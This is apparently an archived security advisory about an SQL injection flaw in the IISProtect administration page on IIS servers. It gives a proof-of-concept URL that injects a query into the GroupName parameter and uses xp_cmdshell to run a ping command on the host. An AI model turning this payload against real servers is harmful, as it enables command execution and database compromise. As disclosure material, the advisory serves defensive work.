10 lines
No EOL
650 B
Text
Executable file
10 lines
No EOL
650 B
Text
Executable file
source: http://www.securityfocus.com/bid/7675/info
|
|
|
|
The IISProtect web administration interface does not properly sanitize user input. This could allow for SQL injection attacks on a Microsoft IIS server running IISProtect.
|
|
|
|
Successful exploitation could result in a compromise of the IISProtect server, attacks on the database or other consequences.
|
|
|
|
http://www.example.com/iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=gyrniff_gr';exec%20maste
|
|
r..xp_cmdshell'ping%2010.10.10.11';--
|
|
|
|
This example invokes the 'xp_cmdshell' stored procedure to execute the ping command on the host operating system. |